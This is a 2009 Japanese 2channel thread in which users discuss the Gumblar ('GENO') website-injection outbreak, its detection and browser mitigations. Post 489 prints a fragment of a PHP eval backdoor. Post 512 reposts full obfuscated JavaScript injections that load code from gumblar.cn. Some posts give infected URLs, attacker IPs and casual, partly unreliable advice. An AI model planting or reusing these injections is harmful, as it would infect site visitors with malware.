ああ、またカスペ同じ症状出てしまいましたorz
最初に保存する先がデスクトップに設定してしまってるみたいで
ファイル名がデスクトップって日本語が入るせいなんでしょうか。
476名無しさん@お腹いっぱい。:2009/05/16(土) 11:01:15
最近頻発してるネトゲの垢ハックでもこのウイルスが疑われてるな
477名無しさん@お腹いっぱい。:2009/05/16(土) 11:02:35
>>475
たぶん、日本語入ってないとこに移すの忘れずに
478463 471:2009/05/16(土) 11:04:28
あとは・・・sqlsodbc.chmの場所ですが

Vistaの場合はsqlsodbc.chmは
C:\Windows\Help\mui\0409
C:\Windows\Help\mui\0411

のどちらかにあると思います
479名無しさん@お腹いっぱい。:2009/05/16(土) 11:04:29
もうだめだ!!!!!!!!
インターネット閉鎖してください!!!!!!!!!!
480名無しさん@お腹いっぱい。:2009/05/16(土) 11:04:31
>>476
垢ハックの主はzlkon.lvだったから、同じタイプという事で気を付けているのでは無いでしょうか。
481名無しさん@お腹いっぱい。:2009/05/16(土) 11:06:20
まだやってんのかよ・・・。
482名無しさん@お腹いっぱい。:2009/05/16(土) 11:06:41
macを確認したいのですがどうやって調べればいいのでしょうか?
483名無しさん@お腹いっぱい。:2009/05/16(土) 11:06:46
>>470
www。livmail。com
(株) りぶメール
店舗連絡先: 0120-二五五-八八八

電凸よろ
484名無しさん@お腹いっぱい。:2009/05/16(土) 11:06:58
インターネット閉鎖できませーん
485名無しさん@お腹いっぱい。:2009/05/16(土) 11:08:01
>>479,484
笑わすなww
48694 101 154:2009/05/16(土) 11:08:51
>>473
の>デフォルトのまま次々進めてOK
はインストールや再起動後でてくるウィザードの話ね。

>>472
ずっと気になっていたんだが、
これってどうやってスキャンさせてるの?

とりあえず、自分が使ってるセキュリティーソフトに不安な人は、
G-DATAの体験版あたりでしのぐのも手かも(その分重いけど)。
avast と BitDefender のデュアルエンジンだったはず。
https://www.junglejapan.com/products/sec/gdata/trial/
メール登録あり。

>>475
状況が分からん。
どこまではやったのか書いてくれ。
俺がやった時は、セットアップファイルのフォルダの場所を日本語を含まない場所に変更したら、大丈夫だったぞ。
解凍した時に自動で出来るフォルダも怪しいから、ドライブ直下に半角英数フォルダ作り直して、
解凍して出てきたファイルを移動させてみて。 
487名無しさん@お腹いっぱい。:2009/05/16(土) 11:09:22
sqlsodbc.chmが見つからないと言ってる人は
ファイル検索ソフトでも使えば?
Everythingとかいろいろあるでしょ
488名無しさん@お腹いっぱい。:2009/05/16(土) 11:10:14
これってファイルにも感染しますか?
大事なのを外付けに避難させてるんだけど、リカバリした後にファイルをパソコンに入れたらまた感染?
489名無しさん@お腹いっぱい。:2009/05/16(土) 11:10:31
うちのサーバも書き換えられてたんで、いろいろファイル見てたんだがこんなのが見つかった
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode
から始まる、2450文字くらいあるんでここに書けないんで一部だけ。
FTPの情報によると5月8日に更新されたファイルのようだ
GENO関係ない?php使ってjavascript書かれてるんだが。unescapeとかも見える

どこかに全文貼ったほうがいい?詳しい人いる?
490名無しさん@お腹いっぱい。:2009/05/16(土) 11:12:54
>>489
それアウトだな。
491名無しさん@お腹いっぱい。:2009/05/16(土) 11:13:28
書こうと思ったらもう載ってた
http://www3.atword.jp/gnome/
緊急のとこね
>>441はmartuzに飛ばされるから
492名無しさん@お腹いっぱい。:2009/05/16(土) 11:15:20
あの〜、皆様にお尋ねしたいのですが、先日から私のPCにインストールしてある
adobe acrobat9.0が勝手に閉じてしまうのですが、原因わかる方おられないでしょうか?
ネットでいろいろ検索してみたところ、ここで「勝手に起動する」とありましたので、
何らかの関連性があると思いカキコしました。詳しく言うと、acrobatを起動して、数秒後
に勝手に閉じてしまいます。もしかしてこのGENOウィルスが原因なんでしょうか?
そもそもGENOウィルスって何ですか?もしそれが原因なら、対処方法はあるのですか?
素人で大変申し訳ありませんが、宜しくお願いします。
493名無しさん@お腹いっぱい。:2009/05/16(土) 11:15:23
>>482
Vistaユーザーだからmacはわからないです><
494名無しさん@お腹いっぱい。:2009/05/16(土) 11:17:06
>>492
まずはこのスレを最初から読もうね
495名無しさん@お腹いっぱい。:2009/05/16(土) 11:19:13
>>489
それ・・・アウト。
どこかにgumblarとか書かれて無いかな?
496名無しさん@お腹いっぱい。:2009/05/16(土) 11:20:09
質問スレって無いんだっけ
混在しちゃうと読みづらい
497名無しさん@お腹いっぱい。:2009/05/16(土) 11:22:53
俺なんてTシャツ着て転げまわるから空拭きの雑巾要らない
498名無しさん@お腹いっぱい。:2009/05/16(土) 11:24:45
Adobe Reader をアンスコすれば解決すんの?
使わないしイラネーな
499489:2009/05/16(土) 11:25:00
>>490,495
今まで見たヤツはgumblarとか書いてあったがこれはない
base64でエンコードされてるからだけどね
500名無しさん@お腹いっぱい。:2009/05/16(土) 11:25:50
>>498
フラッシュプレイヤーも
501名無しさん@お腹いっぱい。:2009/05/16(土) 11:26:00
ちょ、なんだよ。前スレ落ちたな〜なんて思って寝たら、もうこんなにスレ進んでんのかよ。
502名無しさん@お腹いっぱい。:2009/05/16(土) 11:26:25
evalとunescapeの両方があったらほぼ確定じゃないかな

>>441
大当たり 比較的最近の型かな
503名無しさん@お腹いっぱい。:2009/05/16(土) 11:27:53
それカスペでも反応する?
504名無しさん@お腹いっぱい。:2009/05/16(土) 11:29:17
>>499
んじゃ>>491
martuzとかは?
50594 101 154:2009/05/16(土) 11:29:56
>>491
Nice!

506名無しさん@お腹いっぱい。:2009/05/16(土) 11:30:22
おもしれえなこのスレw
507名無しさん@お腹いっぱい。:2009/05/16(土) 11:30:24
ちょっと何この速さ
いつの間に5いってんの・・・
バグ?だれか説明してくれ
508名無しさん@お腹いっぱい。:2009/05/16(土) 11:31:44
PeerGurdianで、危険IP弾いてるんだけど
IP一覧みたいなまとめって、どこかあるんだっけ
94.247.2.195だけ?
509名無しさん@お腹いっぱい。:2009/05/16(土) 11:31:50
Avira AntiVirを導入してるから安心してみておける
510名無しさん@お腹いっぱい。:2009/05/16(土) 11:32:20
>>441
これ踏むとどうなるの?
511名無しさん@お腹いっぱい。:2009/05/16(土) 11:32:38
勿論感染
512改ざんされたソース:2009/05/16(土) 11:33:00
814 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 03:13:30
>>732 なるほど

恐らくこれだな

スクリプト language=ジャバcript<!--
(function(){var a3B2='%';var ONE=unescape((',76ar,20,61,3d,22,53c,72iptE,6egine,22,2cb,3d,22Ver,73ion
(,29,2b,22,2cj,3d,22,22,2c,75,3d,6eaviga,74or,2e,75serAgent,3bif,28,28u,2eind,65,78,4f,66,28,22Win,22),
3e,30,29,26,26(u,2e,69ndexOf(,22NT,20,36,22),3c0),26,26,28docum,65,6et,2ecook,69e,2ein,64,65xO,66(,22miek,3d1,22,29,3c0),26,26(t,79peof(zrvz,74s),21,3d,74ypeof(,22A,22))),
7bzr,76zts,3d,22A,22,3bev,61,6c,28,
22if(w,69,6e,64o,77,2e,22+,61,2b,22)j,3dj+,
22,2b,61+,22Ma,6aor,22+b+a+,22Mi,6eor,22+,62+a,2b,22B,75ild,22+b+,22j,3b,22),3bd,6fcumen,74,2ewri,74e,28,22,3c,73cript,20s,72c,3d,2f,2fgu,6dblar,2ecn,
2frss,2f,3fid,3d,22,2bj,2b,22,3e,3c,5c,2fscrip,74,3e,22),3b,7d').replace(/,/g,a3B2));eval(ONE)})();
-->スクリプト
スクリプト language=ジャバscript><!--
(function(px0E){var vU12=('v.61r.20a.3d.22S.63rip.74Engine.22.2c.62.3d.22V.65r.73ion()+.22.2cj.3d.22.22.2cu.3dna.76igato.72.2e.75.73erA.67ent.3b
if((u.2e.69ndexO.66.28.22Wi.6e.22.29.3e.30).26.26.28u.2eind.65x.4f.66.28.22.4eT.206.22).3c0).26.26(doc.75.6de.6et.2ec.6foki.65.2ei.6edexOf(.22.6diek.3d1.22).3c0).26.26.28.74.79.70e.6ff
(zrvzts.29.21.3dty.70eo.66(.22A.22))).7b.7arvz.74s.3d.22A.22.3be.76al.28.22if(.77ind.6fw.2e.22+.61+.22)
j.3dj+.22+a+.22Major.22+b+a+.22.4din.6fr.22+.62.2ba.2b.22.42uild.22+b+.22j.3b.22.29.3b.64ocument.2ewrite
(.22.3cscri.70t.20.73rc.3d.2f.2fg.75.6dblar.2ecn.2frss.2f.3f.69d.3d.22.2bj+.22.3e.3c.5c.2fs.63ri.70t.3e.22).3b.7d').replace(px0E,'%');eval(unescape(vU12))})(/./g);
-->スクリプト


以上、前スレから転載
ドットがアンダーバーに変わっている亜種もあるっぽい
513名無しさん@お腹いっぱい。:2009/05/16(土) 11:33:39
514名無しさん@お腹いっぱい。:2009/05/16(土) 11:34:01
515名無しさん@お腹いっぱい。:2009/05/16(土) 11:34:43
>>513
サンキュ、助かった
516名無しさん@お腹いっぱい。:2009/05/16(土) 11:34:56
22秒撃ち負けたw
517名無しさん@お腹いっぱい。:2009/05/16(土) 11:35:43
改竄が読めません!
518名無しさん@お腹いっぱい。:2009/05/16(土) 11:35:47
Googleが実現させたシンプルで高機能なブラウザ
http://www.google.co.jp/intl/ja/landing/chrome/index.html

WindowsXPを利用の初心者はこのブラウザでOK!
感染したサイトや、危険なURLを開くとブラウザが危険を知らせてくれます。
Vistaでは埋め込まれたJSに反応しないため危険警告は出ずそのサイトが表示します。

上級者にはFirefoxの設定変更で回避する方法がおすすめです。
519名無しさん@お腹いっぱい。:2009/05/16(土) 11:36:21
>>509
擦り抜けるつってんだろ
520名無しさん@お腹いっぱい。:2009/05/16(土) 11:37:04
なんかもう順番に読んでくのメンドイ;;;
読むより早くスレが進んでいくよーT-T
こんなの実況スレ以来だよ―――――っ。
521名無しさん@お腹いっぱい。:2009/05/16(土) 11:37:13
avastが株上げたな
無料の分際でやるわねなんて思っていないんだからねっ
522名無しさん@お腹いっぱい。:2009/05/16(土) 11:38:20
何で勢いこんなにあがったのかと思ったら同人サイトも改変されちゃったのね
523名無しさん@お腹いっぱい。:2009/05/16(土) 11:38:24
同人スレのまとめの人も混乱してやがる\(^o^)/
524名無しさん@お腹いっぱい。:2009/05/16(土) 11:38:41
感染サイト
hxxp://expss.main.jp/expss2/2005/07/
525名無しさん@お腹いっぱい。:2009/05/16(土) 11:38:58
>>518
>上級者にはFirefoxの設定変更で回避する方法がおすすめです

詳しくお願い
526名無しさん@お腹いっぱい。:2009/05/16(土) 11:40:53
http://www31.atwiki.jp/doujin_vinfo/

同人板のまとめが分かり易いよ
527名無しさん@お腹いっぱい。:2009/05/16(土) 11:41:39
今更だけどProxomitronでフィルタ作れば良くね
528名無しさん@お腹いっぱい。:2009/05/16(土) 11:42:45
>>520
すげえきもい
才能あるなおまえ
529489:2009/05/16(土) 11:42:59
evalとunescape両方あるね
FFFTPからそのphpファイルをTeraPadで開こうとするとAVGが反応する
ローカルにダウンロードしてから開くと反応しない、設定の問題か。
「ウイルス JS/Downloader.Agentが特定されました」って出るね
530名無しさん@お腹いっぱい。:2009/05/16(土) 11:43:18
BSODってなに?
531名無しさん@お腹いっぱい。:2009/05/16(土) 11:43:44
>>521
対応早いのはユーザーの多さじゃないか?
532名無しさん@お腹いっぱい。:2009/05/16(土) 11:44:03
>このウィルスはKasperskyかニフティオンラインスキャン、avast!、ウイルスバスタ2009でしか今現在、検索できないウィルスです

バスター2007、2008はだめなのか?
533名無しさん@お腹いっぱい。:2009/05/16(土) 11:45:00
534名無しさん@お腹いっぱい。:2009/05/16(土) 11:45:25
なんでGENOウイルスなの?GENOは被害者じゃないの?
535名無しさん@お腹いっぱい。:2009/05/16(土) 11:45:50
やられた。同人サイトなんて見てないしgumblarに飛ばされたこともない。
怪しいexe実行した覚えもないしどこから感染したのか…。
536名無しさん@お腹いっぱい。:2009/05/16(土) 11:46:19
>>534
もはや、加害者だろ
537名無しさん@お腹いっぱい。:2009/05/16(土) 11:46:21
>>524
うわ。徹底的にやられてるね。
(function(TitRT)
(function(j4A)
(function(x5E)

とか、計24個貼ってある。
538名無しさん@お腹いっぱい。:2009/05/16(土) 11:46:25
md5+それ以外のハッシュも求めるならAXHashTransおぬぬめ
ttp://www.vector.co.jp/soft/win95/util/se375205.html
539名無しさん@お腹いっぱい。:2009/05/16(土) 11:46:27
>>525
使用ブラウザをFirefoxに変更、アドオンにNoScriptを入れる
540名無しさん@お腹いっぱい。:2009/05/16(土) 11:46:37
>>530
ブルースクリーンとは 【blue screen】 - 意味・解説 : IT用語辞典
http://e-words.jp/w/E38396E383ABE383BCE382B9E382AFE383AAE383BCE383B3.html
541名無しさん@お腹いっぱい。:2009/05/16(土) 11:46:41
ウイルスバスター2009対応してないんじゃないの
542名無しさん@お腹いっぱい。:2009/05/16(土) 11:46:46
>>507
同人関係で大量の個人サイト感染発覚→パニック&祭り
543名無しさん@お腹いっぱい。:2009/05/16(土) 11:46:54
>>532
むしろウイルスバスタ2009平気ってほんとなのか
544名無しさん@お腹いっぱい。:2009/05/16(土) 11:46:56
>>534
被害者っちゃあ被害者だけど
真っ先に発覚したにも関わらず放置した期間が長かったし
545名無しさん@お腹いっぱい。:2009/05/16(土) 11:46:57
>>532
2009はついこの間更新されて検出出来るようになったみたいですね〜

2009に換えろということかも・・・?w
546名無しさん@お腹いっぱい。:2009/05/16(土) 11:47:24
>>518
Genoウイルスが変化したらChromeは直ぐに対応するのかな
547名無しさん@お腹いっぱい。:2009/05/16(土) 11:47:33
>>534
爆発的に感染者を増やした上
対応がお粗末だったから皮肉を込めてそう呼ばれてる
548名無しさん@お腹いっぱい。:2009/05/16(土) 11:48:54
バスターのGENOME.BK って
誤検出じゃないの?
それとは違うくて?
549名無しさん@お腹いっぱい。:2009/05/16(土) 11:48:58
>>545
亜種まで検出してんの?
550名無しさん@お腹いっぱい。:2009/05/16(土) 11:49:08
そして週末土日で対応遅れるだろうし
もうどこのサイトも信用できない((((;゚Д゚))))
551名無しさん@お腹いっぱい。:2009/05/16(土) 11:49:14
>>533
>>539
ありがと
552名無しさん@お腹いっぱい。:2009/05/16(土) 11:49:37
てかウイルス仕掛けたり作ったりしてるの日本人なの?
553名無しさん@お腹いっぱい。:2009/05/16(土) 11:49:39
534の人気に嫉妬
554名無しさん@お腹いっぱい。:2009/05/16(土) 11:50:24
dフル初の感染者確認!
555名無しさん@お腹いっぱい。:2009/05/16(土) 11:50:35
なんぼ週アスと手を組んで安売りセールやってももうGENOのサイト見に行きたくねえ
一度もないけど
556名無しさん@お腹いっぱい。:2009/05/16(土) 11:51:13
557名無しさん@お腹いっぱい。:2009/05/16(土) 11:51:28
>>553
genoの社員じゃねーのw
558名無しさん@お腹いっぱい。:2009/05/16(土) 11:51:31
>>545
いやこの間の更新には入ってない
559名無しさん@お腹いっぱい。:2009/05/16(土) 11:51:34
やべぇ。神戸で豚感染、国内初だって。
もう、何もかも終わった。
560名無しさん@お腹いっぱい。:2009/05/16(土) 11:51:47
hxxp://www.livmail.com/3others-page/janet/tokusen/index.htm
見てきた、しっかりscript埋め込まれてる罠
<script language=javascript><!--
(function(){var UkRR='%';var WdBp=('v&61r&2・・・・・・・・・
561名無しさん@お腹いっぱい。:2009/05/16(土) 11:51:54
リアルでも感染確定\(^o^)/
562名無しさん@お腹いっぱい。:2009/05/16(土) 11:52:01
VISTAなら大丈夫って本当?
HPだけど、4月7日に踏んだときに謎のCPU使用率UP現象があったんだけど。
再起動したら起動できなくなるとかはなかったけど。
563名無しさん@お腹いっぱい。:2009/05/16(土) 11:52:19
>>555
お気に入りから消した
対策してあるけどさすがにカード使う気にも
住所入れる気にもならないな・・・

それでも安売りメール送ってくる
解除したいけどサイト踏みたくないw
564名無しさん@お腹いっぱい。:2009/05/16(土) 11:52:25
豚インフルきちゃったな
565名無しさん@お腹いっぱい。:2009/05/16(土) 11:53:03
>>518
XPにそれインストールして>>524を開いたら、真っ赤になった!
まじ、やべーよ!!
566名無しさん@お腹いっぱい。:2009/05/16(土) 11:53:02
さっきGENOにアクセスしたらつながらなかったんだけど大丈夫かな
こわいなぁ
567名無しさん@お腹いっぱい。:2009/05/16(土) 11:53:04
>>549
亜種までかはわからないけど・・・
568名無しさん@お腹いっぱい。:2009/05/16(土) 11:53:23
タイミングも悪いよなー
豚インフル来ちゃったし、これで余計にマスコミに取り上げられる機会が…orz
569名無しさん@お腹いっぱい。:2009/05/16(土) 11:53:56
524踏んじゃったけど大丈夫…?
570名無しさん@お腹いっぱい。:2009/05/16(土) 11:54:30
踏んじゃったけど大丈夫?って聞くなら最初から踏むなよ
571名無しさん@お腹いっぱい。:2009/05/16(土) 11:55:02
>>539の対処でNoScript入れても許可してるサイトが感染してたら意味ないよな?
最近youtubeやニコ動ですら怖くなってるわ
572名無しさん@お腹いっぱい。:2009/05/16(土) 11:55:05
神戸在住の俺\(^o^)/ オワタ
573名無しさん@お腹いっぱい。:2009/05/16(土) 11:55:07
>>569
だめ
574名無しさん@お腹いっぱい。:2009/05/16(土) 11:55:10
>>568
マスゴミだってPCつかってるから自分が感染すれば注目してくれるかもよ
575名無しさん@お腹いっぱい。:2009/05/16(土) 11:55:15
豚インフルの感染者って地元なんだよね・・・
576名無しさん@お腹いっぱい。:2009/05/16(土) 11:55:15
877 名前: geno [sage] 投稿日: 2009/05/16(土) 11:50:08 ID:bcj3KvYq0
これかわからないけど東方の超大手サイトからavast!でウイルス反応出るんだが
東方自ジャンルじゃないからどのスレいけばいいのかよくわかんね…
とりあえずサイト管理人にメールするしか出来ないのかね
こういうときは



これは・・・
577名無しさん@お腹いっぱい。:2009/05/16(土) 11:55:31
>>524
> 感染サイト
> hxxp://expss.main.jp/expss2/2005/07/
ここも
function(TitRT){var H5h='%';var B4mN=('.76ar.20a.3d.22

578名無しさん@お腹いっぱい。:2009/05/16(土) 11:55:57
リアルでもネットでもウィルス流行wwww
何事だよ
579名無しさん@お腹いっぱい。:2009/05/16(土) 11:56:18
某サイトで見たんですがfirefoxの
Adblock Plusのフィルタリストに

*/94.247.[2-3].[0-255]/*
*/94.229.[64-65].[0-255]/*

を追加するのは効果あるんですか?
580名無しさん@お腹いっぱい。:2009/05/16(土) 11:56:36
524は感染サイトを紹介しているまとめサイトだと思って踏んじゃったんだよー
581名無しさん@お腹いっぱい。:2009/05/16(土) 11:56:59
>>562
VISTAでも多分ヤバイ
582名無しさん@お腹いっぱい。:2009/05/16(土) 11:57:01
>>549
亜種は検出しないよ
583名無しさん@お腹いっぱい。:2009/05/16(土) 11:57:09
>>569
狐かchromeで見たの?
あとテンプレの通りに確認してみ?
念のためにavastさんでチェックな
最後に神社でお百度参りするんだ
584名無しさん@お腹いっぱい。:2009/05/16(土) 11:58:21
VISTAって、今のところままだ感染報告来てないよな?
これから亜種が出てくるだろうが


ま、俺のところ98なんで関係ないんですがね
585名無しさん@お腹いっぱい。:2009/05/16(土) 11:58:25
>>581
マジか。
まぁ、今はクリーンインスコして快適にはなったんだけどね。
色々なとこで「VISTAなら大丈夫」とか言ってるのはなんなんだろ
586名無しさん@お腹いっぱい。:2009/05/16(土) 11:59:04
おい、VISTAもあぶないのかよ。ほんまかいな。どうなってんだよ
587名無しさん@お腹いっぱい。:2009/05/16(土) 11:59:50
しかけてる奴もvista大丈夫大丈夫言われるとやりたくなっちゃうだろ
588名無しさん@お腹いっぱい。:2009/05/16(土) 12:00:00
524はあぼーん推奨だろ
589名無しさん@お腹いっぱい。:2009/05/16(土) 12:00:34
東方同人サイト超大手、感染報告来たね

これはニコオタ全滅フラグ
590名無しさん@お腹いっぱい。:2009/05/16(土) 12:01:14
Vistaでも感染シマス
591名無しさん@お腹いっぱい。:2009/05/16(土) 12:01:15
>>546
Google次第だろうな
592名無しさん@お腹いっぱい。:2009/05/16(土) 12:01:31
>>519
工エエェェ(´д`)ェェエエ工工
ああああああああああああああああああああああああああああああああああ
593名無しさん@お腹いっぱい。:2009/05/16(土) 12:02:12
熱い展開になってきたな
594名無しさん@お腹いっぱい。:2009/05/16(土) 12:02:29
>>585
過去ログによると
GENOのサイトがお詫び文だか弁明ページだかで
そういうデマを流したらしい。
595名無しさん@お腹いっぱい。:2009/05/16(土) 12:02:45
>>487
Meの場合、そもそも存在しないんでは?
596名無しさん@お腹いっぱい。:2009/05/16(土) 12:02:46
これは日本\(^o^)/
597594:2009/05/16(土) 12:03:36
違うわ思い違いだわ。
寝惚けてるので落ちるゴメン
598名無しさん@お腹いっぱい。:2009/05/16(土) 12:04:08
>>533
そのリンク先、
疑わしきURLはクリックしなければ、大丈夫って受け取るヤツがいそう。
全て対策したうえで、かつ 疑わしきリンクをクリックしない にしてほしいな。


あと、次スレのテンプレでは そろそろ >>2は止めたほうがイイと思う。
もう、対策されたReaderが出ているんだし。
やむを得ず 古いバージョン(9.1以前)を使う状況にいるヤツは こんなスレに来ないはず。
全員アップデートしろ! だが、また脆弱性みつかるかもしれないから、JavaScript切っておけ でよかろうよ。

FirefoxにNoScript入れて、なおかつプラグインを全部切った方がいいよ。
NoScriptは初期設定がどうだったか忘れたけど、トップサイトは許可とかいう「ザル化設定」が沢山あるから。
Flashみられなくたって、PDFがブラウザで読めなくたって、いつ来るか分からない新型亜種に感染するよりいいだろ。
599名無しさん@お腹いっぱい。:2009/05/16(土) 12:04:16
600名無しさん@お腹いっぱい。:2009/05/16(土) 12:04:42
Win系なら全部やばいって事でいいだろ
用心に越した事はないぞ?
601名無しさん@お腹いっぱい。:2009/05/16(土) 12:04:46
怪しいサイトはjavascriptを無効にして踏むこと
602名無しさん@お腹いっぱい。:2009/05/16(土) 12:05:25
>>600
つまり、Linuxにしろと?
603名無しさん@お腹いっぱい。:2009/05/16(土) 12:05:28
とりあえず、面白半分で危険なサイトのURL(に近い)を貼るのは止めにしません?

ウィルス貼ってるのと同じようなものだし、
今から知識を得て対策しようとしてる人がカワイソだよ
604名無しさん@お腹いっぱい。:2009/05/16(土) 12:05:30
>>596
なあにが日本万歳だこの糞野郎
605名無しさん@お腹いっぱい。:2009/05/16(土) 12:05:36
avastがうるせーと思ったけど、調べてみたらなるほど。やるじゃん
いつもJS切ってるから大丈夫だったけど、警告はされるのね
606名無しさん@お腹いっぱい。:2009/05/16(土) 12:06:04
>>565
オイラもXPだから入れてやってみよう
607名無しさん@お腹いっぱい。:2009/05/16(土) 12:06:12
>>592
少なくとも改竄されたhtml踏んでも反応はしないし、恐らくだがpdf読み込んだ後も反応しなかった。
その時のウイルス自体には対応しただろうけど、htmlの改竄が見抜けない以上、すり抜けは続くんじゃないかな。
まあ無料版の8 Personalってのもあると思うけど。
608名無しさん@お腹いっぱい。:2009/05/16(土) 12:06:33
この板だとネタなのかマジレスなのか分からん奴多いんだよな
609名無しさん@お腹いっぱい。:2009/05/16(土) 12:06:47
>>602
そのうちMACとか全部に感染する亜種がでるかもな
610名無しさん@お腹いっぱい。:2009/05/16(土) 12:07:59
>>599
ワロタwww
Genoウィルスが問題ないってw
611名無しさん@お腹いっぱい。:2009/05/16(土) 12:08:00
Googleでも感染するってある意味最強じゃね?
612名無しさん@お腹いっぱい。:2009/05/16(土) 12:08:31
613名無しさん@お腹いっぱい。:2009/05/16(土) 12:09:12
>>611
グーグルのサーバーにも感染してるの?
ってことは、ググったらアウト?
614600:2009/05/16(土) 12:09:13
>>602
踏んでしまったのですが、○○ですが大丈夫でしょうか?(○○はOS)
って質問するよりログ読んだ方が速いだろと
615名無しさん@お腹いっぱい。:2009/05/16(土) 12:09:14
ぐぐってリンク開かなければ大丈夫なんじゃなくて
検索使うだけでアウアウ?
616名無しさん@お腹いっぱい。:2009/05/16(土) 12:10:43
>>524のサイトは難読化されたコードが24個も埋め込まれているw
617名無しさん@お腹いっぱい。:2009/05/16(土) 12:10:49
俺のブラウザOPERAなんだけど…firefoxみたいに対策できないの?
618名無しさん@お腹いっぱい。:2009/05/16(土) 12:11:54
凄いアホな質問していいか?
サイトでの感染があるのは分かったけど、感染したパソコンから送られた『メール』で
感染する可能性は?
619名無しさん@お腹いっぱい。:2009/05/16(土) 12:11:57
Lunascapeのscript、Java無効設定じゃ危ない?
620名無しさん@お腹いっぱい。:2009/05/16(土) 12:12:05
>>603
みんなネットサーフィンで知らずに踏んでると思われ
621名無しさん@お腹いっぱい。:2009/05/16(土) 12:12:06
【新型インフル】 "ついに発生" 渡航歴ない高校生、新型インフルエンザと確定。どうやって感染?…他に17人の体調不良者も
http://tsushima.2ch.net/test/read.cgi/newsplus/1242442362/
622名無しさん@お腹いっぱい。:2009/05/16(土) 12:12:11
>>607
地道にNoScriptでがんばろうと思います。
623名無しさん@お腹いっぱい。:2009/05/16(土) 12:12:09
最初に作った犯人を逮捕することはできないの?
その犯人に拡大の仕組みを自白させれば解決するんじゃないの?
624名無しさん@お腹いっぱい。:2009/05/16(土) 12:12:16
>>617
F12キー押してJavaScriptとプラグインのチェックを外せばおk
625名無しさん@お腹いっぱい。:2009/05/16(土) 12:13:05
このウイルスは広める能力はないから
626名無しさん@お腹いっぱい。:2009/05/16(土) 12:13:21
>>620
普通に法律の解説サイトとかにウイルス紛れ込んでいるからな・・・
アダルトサイトとか違法DLサイトなら分かるんだが・・・
627名無しさん@お腹いっぱい。:2009/05/16(土) 12:14:18
>>624
それだと安心できるな
しかしインターネットがつまらないものになりそうだ
628名無しさん@お腹いっぱい。:2009/05/16(土) 12:14:47
>>623
東欧とかロシアとか中国じゃないのか?本拠地は
そいつらをすぐに逮捕できると思うか?
629名無しさん@お腹いっぱい。:2009/05/16(土) 12:15:12
524のサイト
gumblar.cn の現在のステータス
疑わしいサイトとして認識されています。このウェブサイトにアクセスすると
コンピュータに損害を与える可能性があります。

5397 個のドメインを感染させています。

増えてる ((;゜Д゜)ガクガクブルブル
630名無しさん@お腹いっぱい。:2009/05/16(土) 12:15:25
国家が匿うな
631名無しさん@お腹いっぱい。:2009/05/16(土) 12:15:29
XPなんだけど、sqlsodbc.chmのサイズが変。ハッシュもあわなかった。
cmd、regedit、再起動することはできる

ニフティのスキャンは、ロックのかかったファイルがいっぱい出てきた以外には、何もでなかった

sqlsodbc.chmのフォルダが圧縮されてる(青文字で表示されてる)のは何か関係ある?
それとも亜種なだけ?
632名無しさん@お腹いっぱい。:2009/05/16(土) 12:15:34
NoScriptでGoogle開いてもJS禁止されてるね
Googleが危険なサイトだとみなされている翔子です
633名無しさん@お腹いっぱい。:2009/05/16(土) 12:15:52
>>624
やってくる
ありがとう!
634名無しさん@お腹いっぱい。:2009/05/16(土) 12:15:59
>>627
サイトごとの編集を使うってのあるが、結局許可したサイトが汚染されたら意味無し
まあ俺はyoutubeとかを許可しているけど
635名無しさん@お腹いっぱい。:2009/05/16(土) 12:16:25
俺のPCにはsqlsodbc.chmが存在しないからかなり楽観視してるけど
そんなの関係ねえのかな?
636名無しさん@お腹いっぱい。:2009/05/16(土) 12:18:03
>>635
>>4
>※sqlsodbc.chmを使わない亜種の存在が確認されていますので、
>この方法に完全に頼るのは危険かもしれません。
637名無しさん@お腹いっぱい。:2009/05/16(土) 12:18:31
Noscriptなら許可したサイトを開いても94.247.2.195は許可されないから問題ないんじゃないの?
638名無しさん@お腹いっぱい。:2009/05/16(土) 12:18:49
>>636
くそがああああああああああああ
俺を早く安心させてくれ
639名無しさん@お腹いっぱい。:2009/05/16(土) 12:19:02
裁判員に選ばれたらウイルス製作者を死刑にしようと思う。
640名無しさん@お腹いっぱい。:2009/05/16(土) 12:20:15
>>631
数回仮想環境で感染してみたけどcmdとregedit普通に動作出来たり
再度感染すると出来なかったりバラバラみたい
641名無しさん@お腹いっぱい。:2009/05/16(土) 12:20:27
>>638
回線をハサミで切ったらおk
642名無しさん@お腹いっぱい。:2009/05/16(土) 12:20:32
NO scriptなんて甘っちょろいことしないでjava全部無効でいいだろ
you tubeとか見れなくなるけどさ
643名無しさん@お腹いっぱい。:2009/05/16(土) 12:21:02
>>631
SQL ServerやMSDE、Visual Studio等を入れるとバージョンによってサイズ変わるよ。
ファイルの更新日付が最近じゃなければ、sqlsodbc.chmそのものはそれほど
気にする必要がない。他の症状が何もないなら気にしなくていいと思う。
644名無しさん@お腹いっぱい。:2009/05/16(土) 12:21:09
javascriptじゃない感染方法もあるんじゃないの?
645名無しさん@お腹いっぱい。:2009/05/16(土) 12:21:36
FirefoxでNoScript入れて無くてもJavaScriptを有効にしてなければ平気?
646600:2009/05/16(土) 12:21:39
おいお前らJavaScriptを略すならjsにしろ
Javaと区別つかねーだろうが
647名無しさん@お腹いっぱい。:2009/05/16(土) 12:22:07
>>613
>>615
さっきやって分かった。FirefoxはデフォルトだとGoogleのリンク先先読み設定あるから、
about:config で network.prefetch-next を falseにしとけ。
648名無しさん@お腹いっぱい。:2009/05/16(土) 12:22:09
捕まえたやつに数億賞金出せばおもしろいことになりそうだな
649名無しさん@お腹いっぱい。:2009/05/16(土) 12:22:40
>>632
自分で許可しなければ、全て禁止ですwww
650名無しさん@お腹いっぱい。:2009/05/16(土) 12:22:43
>>640
共通項ってなかった?
651名無しさん@お腹いっぱい。:2009/05/16(土) 12:23:28
はぁ、おっぱい見てぇ
652名無しさん@お腹いっぱい。:2009/05/16(土) 12:23:35
>>647
これ、さっきのりぶメールって何のサイトなんだろうと思ってぐぐったら
検索結果が表示された瞬間Avast!が吼えまくったんで気づいたんだ。
653名無しさん@お腹いっぱい。:2009/05/16(土) 12:23:36
>>632
いやお前のNoScriptの設定でgoogle.co.jpかgoogle.comを禁止してるだけだろ
Noscript入れたばかりでそうなってるかもしれないけど
654名無しさん@お腹いっぱい。:2009/05/16(土) 12:23:41
FireFoxにNoScriptでウイルス回避しても
行きつけのサイトをスクリプト許可していたら危険URLに飛ばされるだろうし
上級者なら気づくが超初心者ならスクリプトの許可をしそうでやばいな
